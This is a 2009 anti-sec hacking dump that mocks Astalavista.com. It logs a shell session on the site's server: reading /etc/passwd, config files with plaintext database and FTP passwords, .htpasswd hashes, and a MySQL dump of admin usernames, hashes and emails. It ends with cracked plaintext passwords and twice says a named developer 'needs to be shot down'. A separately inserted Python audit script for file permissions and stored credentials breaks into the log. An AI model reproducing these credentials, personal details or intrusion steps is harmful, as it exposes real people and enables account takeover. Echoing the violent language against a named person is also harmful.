
[ASCII-art banner: ASTALAVISTA]
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

From <http://astalavista.com/faq>:

>> 03. Who's behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the "community" but for the money, they spread exploits for kids, claim to be a security community (with no real sense of security on their own servers), and they charge you $6.66 per month to access a dead forum with a directory filled with public releases and outdated / broken services. We wanted to see how good that "team of security and IT professionals" really is.

Let's begin.

anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner... LiteSpeed
[+] Injecting shellcode...
[-] Wait for it
[~] We g0tshell

uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)
sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com

sh-3.2$ pwd
/home/com/public_html
sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx--x--x 11 com com 4096 Jun 25 2008 ..
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx 2 com com 4096 May 19 00:50 config
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
-rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
-rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
-rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
-rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
-rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
sh-3.2$ head -20
index.php
<?php
/**
 * The main page for the CMS
 * @copyright CONTREXX CMS - COMVATION AG
 * @author Comvation Development Team
 * @version v1.0.9.10.1 stable
 * @package contrexx
 * @subpackage core
 * @link http://www.contrexx.com/ contrexx homepage
 * @since v0.0.0.0
 * @todo Capitalize all class names in project
 * @uses /config/configuration.php
 * @uses /config/settings.php
 * @uses /config/version.php
 * @uses /core/API.php
 * @uses /core_modules/cache/index.class.php
 * @uses /core/error.class.php
 * @uses /core_modules/banner/index.class.php
 * @uses /core_modules/contact/index.class.php

sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx 2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
sh-3.2$ cat configuration.php
[snip]
$_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
$_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
$_DBCONFIG['user'] = 'contrexxuser2'; // Database username
$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
$_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
[snip]
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
$_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
$_FTPCONFIG['path'] = '/'; // Ftp path to cms

sh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
total 2913780
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess
sh-3.2$ cat .htaccess
authType Basic
authName DVD
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg

sh-3.2$ cat test.php
<?php
$url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
$url = str_replace(array('&amp;', '&#38;'), '&', base64_decode(rawurldecode($url)));
echo $url;
?>

sh-3.2$ cd modifications/
sh-3.2$ ls -la
total 32
drwxr-xr-x 8 com com 4096 May 11 12:48 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
sh-3.2$ ls -R
.:
com_avtng cronjobs onlinetools pjirc search _tmp

./com_avtng:
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts

./com_avtng/scripts:
popunder.js

./cronjobs:
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp

./cronjobs/tmp:
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv

./onlinetools:
index.php

./pjirc:
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd

./pjirc/img:
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif verre-eau.gif argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif verre-vin.gif ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif

./pjirc/snd:
bell2.au ding.au

./search:
searchEngines.php search.php

./_tmp:
defaultPorts.php defaultPorts.txt

sh-3.2$ cd cronjobs/
sh-3.2$ cat
exploits.php
[snip]
$categories = array();
$milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
$expolits = file($milw0rmFile);
$comExploits = array();
[snip]
// manage data
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
    // get path and title
    $expolits[$x] = trim($expolits[$x]);
    $path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
    $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
    // check if file exists
    if (file_exists($path)) {
        $text = file_get_contents($path);
        // get content and date
        //$text = htmlspecialchars($text, ENT_QUOTES);
        $tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-8"));
        if ($tmptext != '') {
            $text = $tmptext;
        } else {
            $text = addslashes(htmlentities($text, ENT_QUOTES));
        }
        $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
        $tmp = explode('-', $date);
        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
        $cat = getCategory ($path);
        $ext = pathinfo(basename($path));
        $ext = $ext['extension'];
        $qStr = " SELECT `id` FROM `contrexx_module_exploits` WHERE `title` = '" . $title . "' AND `date` = '" . $date . "' ";
        echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
        $q = $_objDB->query($qStr);
        if ($q->numRows() == 0) {
            // prepare array
            $comExploits[$x]['date'] = $date;
            $comExploits[$x]['title'] = $title;
            $comExploits[$x]['author'] = 'milw0rm';
            $comExploits[$x]['text'] = $text;
            $comExploits[$x]['source'] = $ext;
            $comExploits[$x]['url1'] = '';
            $comExploits[$x]['url2'] = '';
            $comExploits[$x]['catid'] = $cat;
            $comExploits[$x]['lang'] = '2';
            $comExploits[$x]['userid'] = '12';
            $comExploits[$x]['startdate'] = '0000-00-00';
            $comExploits[$x]['enddate'] = '0000-00-00';
            $comExploits[$x]['status'] = '1';
            $comExploits[$x]['changelog'] = $date;
        }
[snip]
$xml = '<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>ASTALAVISTA.com - Exploits</title>
<link>http://www.astalavista.com/exploits</link>
<description>All availably Exploits.</description>
<language>en-us</language>
<lastBuildDate>' . date('F, j M Y H:i:s O') . '</lastBuildDate>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Astalavista.com</generator>
<webMaster>info@astalavista.com</webMaster>' . $items . '
</channel>
</rss>';
if (file_exists(FULLPATH . '/feed/exploits.xml')) {
    unlink (FULLPATH . '/feed/exploits.xml');
}
file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
[snip]
sh-3.2$ cat
exploits.sh
#!/bin/sh
###########################################################
#                                                         #
# Title:       milw0rm exploits adder                     #
# Description: Add all milw0rm exploits to the            #
#              Astalavista.com database                   #
#                                                         #
# Company:     Astalavista Group                          #
# Author:      Paulo M. Santos                            #
# E-Mail:      paulo.santos@astalavista.ch                #
#                                                         #
###########################################################

# path
this_path=/home/com/public_html/modifications/cronjobs
# change directory
cd $this_path
cd tmp/
# delete files
rm -rf milw0rm.tar.* &
rm -rf milw0rm/ &
# wget milw0rm package
wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
# extract milw0rm package
tar -xvf milw0rm.tar.bz2
# change owner
chown -R com .
chgrp -R com .
# execute php script
cd $this_path
php -q exploits.php
# delete files
rm -rf tmp/milw0rm.tar.*
rm -rf tmp/milw0rm/

sh-3.2$ echo "Paulo M. Santos needs to be shot down."
Paulo M. Santos needs to be shot down.

mysql -u contrexxuser2 -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 261694
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| com_contrexx2      |
| com_contrexx2_live |
| test               |
+--------------------+
4 rows in set (0.00 sec)

mysql> use com_contrexx2_live
Database changed
mysql> show tables;
+--------------------------------------------------+
| Tables_in_com_contrexx2_live                     |
+--------------------------------------------------+
| cc_banner_counter
| cc_search_counter
| contrexx_access_group_dynamic_ids
| contrexx_access_group_static_ids
| contrexx_access_rel_user_group
| contrexx_access_settings
| contrexx_access_user_attribute
| contrexx_access_user_attribute_name
| contrexx_access_user_attribute_value
| contrexx_access_user_core_attribute
| contrexx_access_user_groups
| contrexx_access_user_mail
| contrexx_access_user_profile
| contrexx_access_user_title
| contrexx_access_user_validity
| contrexx_access_users
| contrexx_backend_areas
| contrexx_backups
| contrexx_content
| contrexx_content_history
| contrexx_content_logfile
| contrexx_content_navigation
| contrexx_content_navigation_history
| contrexx_ids
| contrexx_languages
| contrexx_lib_country
| contrexx_log
| contrexx_module_alias_source
| contrexx_module_alias_target
| contrexx_module_block_blocks
| contrexx_module_block_rel_lang
| contrexx_module_block_rel_pages
| contrexx_module_block_settings
| contrexx_module_blog_categories
| contrexx_module_blog_comments
| contrexx_module_blog_message_to_category
| contrexx_module_blog_messages
| contrexx_module_blog_messages_lang
| contrexx_module_blog_networks
| contrexx_module_blog_networks_lang
| contrexx_module_blog_settings
| contrexx_module_blog_votes
| contrexx_module_calendar
| contrexx_module_calendar_access
| contrexx_module_calendar_categories
| contrexx_module_calendar_form_data
| contrexx_module_calendar_form_fields
| contrexx_module_calendar_registrations
| contrexx_module_calendar_settings
| contrexx_module_calendar_style
| contrexx_module_contact_form
| contrexx_module_contact_form_data
| contrexx_module_contact_form_field
| contrexx_module_contact_settings
| contrexx_module_data_categories
| contrexx_module_data_message_to_category
| contrexx_module_data_messages
| contrexx_module_data_messages_lang
| contrexx_module_data_placeholders
| contrexx_module_data_settings
| contrexx_module_directory_access
| contrexx_module_directory_categories
| contrexx_module_directory_dir
| contrexx_module_directory_inputfields
| contrexx_module_directory_levels
| contrexx_module_directory_mail
| contrexx_module_directory_rel_dir_cat
| contrexx_module_directory_rel_dir_level
| contrexx_module_directory_settings
| contrexx_module_directory_settings_google
| contrexx_module_directory_vote
| contrexx_module_docsys
| contrexx_module_docsys_categories
| contrexx_module_egov_configuration
| contrexx_module_egov_orders
| contrexx_module_egov_product_calendar
| contrexx_module_egov_product_fields
| contrexx_module_egov_products
| contrexx_module_egov_settings
| contrexx_module_exploits
| contrexx_module_exploits_categories
| contrexx_module_feed_category
| contrexx_module_feed_news
| contrexx_module_feed_newsml_association
| contrexx_module_feed_newsml_categories
| contrexx_module_feed_newsml_documents
| contrexx_module_feed_newsml_providers
| contrexx_module_forum_access
| contrexx_module_forum_categories
| contrexx_module_forum_categories_lang
| contrexx_module_forum_notification
| contrexx_module_forum_postings
| contrexx_module_forum_rating
| contrexx_module_forum_settings
| contrexx_module_forum_statistics
| contrexx_module_gallery_categories
| contrexx_module_gallery_comments
| contrexx_module_gallery_language
| contrexx_module_gallery_language_pics
| contrexx_module_gallery_pictures
| contrexx_module_gallery_settings
| contrexx_module_gallery_votes
| contrexx_module_guestbook
| contrexx_module_guestbook_settings
| contrexx_module_livecam
| contrexx_module_livecam_settings
| contrexx_module_market
| contrexx_module_market_access
| contrexx_module_market_categories
| contrexx_module_market_mail
| contrexx_module_market_paypal
| contrexx_module_market_settings
| contrexx_module_market_spez_fields
| contrexx_module_mediadir_access
| contrexx_module_mediadir_categories
| contrexx_module_mediadir_comments
| contrexx_module_mediadir_dir
| contrexx_module_mediadir_inputfields
| contrexx_module_mediadir_levels
| contrexx_module_mediadir_mail
| contrexx_module_mediadir_rel_dir_cat
| contrexx_module_mediadir_rel_dir_level
| contrexx_module_mediadir_reports
| contrexx_module_mediadir_settings
| contrexx_module_mediadir_settings_google
| contrexx_module_mediadir_vote
| contrexx_module_memberdir_directories
| contrexx_module_memberdir_name
| contrexx_module_memberdir_settings
| contrexx_module_memberdir_values
| contrexx_module_nettools_allowed_groups
| contrexx_module_nettools_settings
| contrexx_module_news
| contrexx_module_news_access
| contrexx_module_news_categories
| contrexx_module_news_settings
| contrexx_module_news_teaser_frame
| contrexx_module_news_teaser_frame_templates
| contrexx_module_news_ticker
| contrexx_module_newsletter
| contrexx_module_newsletter_attachment
| contrexx_module_newsletter_category
| contrexx_module_newsletter_confirm_mail
| contrexx_module_newsletter_rel_cat_news
| contrexx_module_newsletter_rel_user_cat
| contrexx_module_newsletter_settings
| contrexx_module_newsletter_template
| contrexx_module_newsletter_tmp_sending
| contrexx_module_newsletter_user
| contrexx_module_newsletter_user_title
| contrexx_module_onlinetools_defaultports
| contrexx_module_onlinetools_defaultports_back
| contrexx_module_onlinetools_geolitecity_blocks
| contrexx_module_onlinetools_geolitecity_country
| contrexx_module_onlinetools_geolitecity_location
| contrexx_module_podcast_category
| contrexx_module_podcast_medium
| contrexx_module_podcast_rel_category_lang
| contrexx_module_podcast_rel_medium_category
| contrexx_module_podcast_settings
| contrexx_module_podcast_template
| contrexx_module_proxydb
| contrexx_module_recommend
| contrexx_module_repository
| contrexx_module_securitynews_cats
| contrexx_module_securitynews_feeds
| contrexx_module_securitynews_news
| contrexx_module_shop_categories
| contrexx_module_shop_config
| contrexx_module_shop_countries
| contrexx_module_shop_currencies
| contrexx_module_shop_customers
| contrexx_module_shop_importimg
| contrexx_module_shop_lsv
| contrexx_module_shop_mail
| contrexx_module_shop_mail_content
| contrexx_module_shop_manufacturer
| contrexx_module_shop_order_items
| contrexx_module_shop_order_items_attributes
| contrexx_module_shop_orders
| contrexx_module_shop_payment
| contrexx_module_shop_payment_processors
| contrexx_module_shop_pricelists
| contrexx_module_shop_products
| contrexx_module_shop_products_attributes
| contrexx_module_shop_products_attributes_name
| contrexx_module_shop_products_attributes_value
| contrexx_module_shop_products_downloads
| contrexx_module_shop_rel_countries
| contrexx_module_shop_rel_payment
| contrexx_module_shop_rel_shipment
| contrexx_module_shop_shipment_cost
| contrexx_module_shop_shipper
| contrexx_module_shop_vat
| contrexx_module_shop_zones
| contrexx_module_u2u_address_list
| contrexx_module_u2u_message_log
| contrexx_module_u2u_sent_messages
| contrexx_module_u2u_settings
| contrexx_module_u2u_user_log
| contrexx_modules
| contrexx_sessions
| contrexx_settings
| contrexx_settings_smtp
| contrexx_skins
| contrexx_stats_browser
| contrexx_stats_colourdepth
| contrexx_stats_config
| contrexx_stats_country
| contrexx_stats_hostname
| contrexx_stats_javascript
| contrexx_stats_operatingsystem
| contrexx_stats_referer
| contrexx_stats_requests
| contrexx_stats_requests_summary
| contrexx_stats_screenresolution
| contrexx_stats_search
| contrexx_stats_spiders
| contrexx_stats_spiders_summary
| contrexx_stats_visitors
| contrexx_stats_visitors_summary
| contrexx_voting_additionaldata
| contrexx_voting_email
| contrexx_voting_rel_email_system
| contrexx_voting_results
| contrexx_voting_system
| foo
+--------------------------------------------------+
227 rows in set (0.01 sec)
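The listings and config dumps above show three conditions that handed the apache user everything it needed: world-writable directories and files under the web root (config/, cache/, feed/, images/, media/, themes/, tmp/ and .htaccess are all drwxrwxrwx or -rwxrwxrwx), database and FTP passwords stored in plaintext in configuration.php, and a dvd/.htaccess whose AuthUserFile points at a .htpasswd under /home/com that the web server user can read. The script below is an added example, not code from this writeup or from Astalavista or Contrexx, that checks for exactly those three conditions. It builds a constructed sample tree in a temporary directory (the paths, file contents and credentials in it are made up for the demo and are not the leaked values) and reports what it finds.

```python
import os
import re
import stat
import tempfile

# PHP-style config assignments such as $_DBCONFIG['password'] = '...';
# Only quoted values count, so $_FTPCONFIG['use_passive'] = true; is not reported.
CRED_RE = re.compile(
    r"""\$_[A-Z]+\[\s*['"]([A-Za-z_]*(?:pass|pwd|user)[A-Za-z_]*)['"]\s*\]\s*=\s*['"]([^'"]*)['"]"""
)
# Apache AuthUserFile directive (directive names are case-insensitive)
AUTHFILE_RE = re.compile(r"^\s*authuserfile\s+(\S+)", re.IGNORECASE | re.MULTILINE)


def world_writable(root):
    """Paths under root (directories and files) with the other-write bit set, relative to root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for p in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            st = os.lstat(p)
            if not stat.S_ISLNK(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(os.path.relpath(p, root))
    return sorted(hits)


def plaintext_credentials(root, exts=(".php", ".conf")):
    """(relative path, key, value) for every quoted credential-like assignment found."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for f in sorted(files):
            if not f.endswith(exts):
                continue
            p = os.path.join(dirpath, f)
            with open(p, encoding="utf-8", errors="replace") as fh:
                for key, value in CRED_RE.findall(fh.read()):
                    if value:
                        found.append((os.path.relpath(p, root), key, value))
    return found


def htpasswd_targets(root):
    """(relative .htaccess path, AuthUserFile target, readable by the account running this?)."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            p = os.path.join(dirpath, ".htaccess")
            with open(p, encoding="utf-8", errors="replace") as fh:
                for target in AUTHFILE_RE.findall(fh.read()):
                    out.append((os.path.relpath(p, root), target, os.access(target, os.R_OK)))
    return out


def audit(root):
    return {
        "world_writable": world_writable(root),
        "credentials": plaintext_credentials(root),
        "htpasswd": htpasswd_targets(root),
    }


def build_sample_tree():
    """Constructed stand-in for the layout seen above: a web root plus a home directory
    holding the .htpasswd that the web root's dvd/.htaccess points at.
    Returns (web_root, tempdir_object); keep the object alive while using the tree."""
    tmp = tempfile.TemporaryDirectory()
    home = os.path.join(tmp.name, "home", "com")
    web = os.path.join(home, "public_html")
    for d in ("config", "cache", "dvd"):
        os.makedirs(os.path.join(web, d))
    os.makedirs(os.path.join(home, "domains", "example.test", ".htpasswd"))

    htpasswd = os.path.join(home, "domains", "example.test", ".htpasswd", ".htadm_pwd")
    with open(htpasswd, "w") as fh:
        fh.write("DVDdownload:constructed-hash\n")
    with open(os.path.join(web, "dvd", ".htaccess"), "w") as fh:
        fh.write("AuthType Basic\nAuthName DVD\nAuthUserFile %s\nrequire valid-user\n" % htpasswd)
    with open(os.path.join(web, "config", "configuration.php"), "w") as fh:
        fh.write(
            "<?php\n"
            "$_DBCONFIG['host'] = 'localhost';\n"
            "$_DBCONFIG['user'] = 'cmsuser';            // constructed\n"
            "$_DBCONFIG['password'] = 'dbpass-example'; // constructed\n"
            "$_FTPCONFIG['use_passive'] = true;         // not a credential\n"
            "$_FTPCONFIG['password'] = 'ftppass-example';\n"
        )
    with open(os.path.join(web, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine on\n")

    # Reproduce the dangerous modes: world-writable config/, cache/ and .htaccess
    for p in ("config", "cache", ".htaccess"):
        os.chmod(os.path.join(web, p), 0o777)
    return web, tmp


if __name__ == "__main__":
    web_root, keep = build_sample_tree()
    for section, rows in audit(web_root).items():
        print(section)
        for row in rows:
            print("  ", row)
```

The readability column only answers the question for the account the script runs under, so run it as the web server user (uid 100, apache, on the host above) rather than as root; the credential regex is deliberately narrow to the $_DBCONFIG / $_FTPCONFIG / $_CONFIG style shown on this page and will need widening for other CMSes.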
mysql> select count(*) as skids from contrexx_access_users;
+-------+
| skids |
+-------+
| 53699 |
+-------+
1 row in set (0.00 sec)

mysql> describe contrexx_access_users;
+------------------+------------------------------------------+------+-----+--------------+----------------+
| Field            | Type                                     | Null | Key | Default      | Extra          |
+------------------+------------------------------------------+------+-----+--------------+----------------+
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |
| username         | varchar(40)                              | YES  | MUL | NULL         |                |
| password         | varchar(32)                              | YES  |     | NULL         |                |
| regdate          | int(14) unsigned                         | NO   |     | 0            |                |
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
| email            | varchar(255)                             | YES  |     | NULL         |                |
| email_access     | enum('everyone','members_only','nobody') | NO   |     | nobody       |                |
| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |
| active           | tinyint(1)                               | NO   |     | 0            |                |
| profile_access   | enum('everyone','members_only','nobody') | NO   |     | members_only |                |
| restore_key      | varchar(32)                              | NO   |     |              |                |
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |
| u2u_active       | enum('0','1')                            | NO   |     | 1            |                |
+------------------+------------------------------------------+------+-----+--------------+----------------+
18 rows in set (0.00 sec)

mysql> select username,password,email from
contrexx_access_users where is_admin = 1;
+------------+----------------------------------+-----------------------------+
| username   | password                         | email                       |
+------------+----------------------------------+-----------------------------+
| system     | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com          |
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com      |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
| schmid     | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com   |
+------------+----------------------------------+-----------------------------+
4 rows in set (0.04 sec)

mysql> exit;
Bye

[~] There you go, your "team of security and IT professionals" is a joke.

+------------------------------+
system:f82BN3+_*
Be1er0ph0r:belerophor4astacom
prozac:asta4cms!
commander:mpbdaagf6m
sykadul:ak29eral
+------------------------------+

[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s) ...and the others, find another area to get paid from, security isn't for sale and you obviously fail at it.

[~] Let's move to astalavista.net now.

From <https://www.astalavista.net/>:

>> Everyone knows that the best defense is a good offense.
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
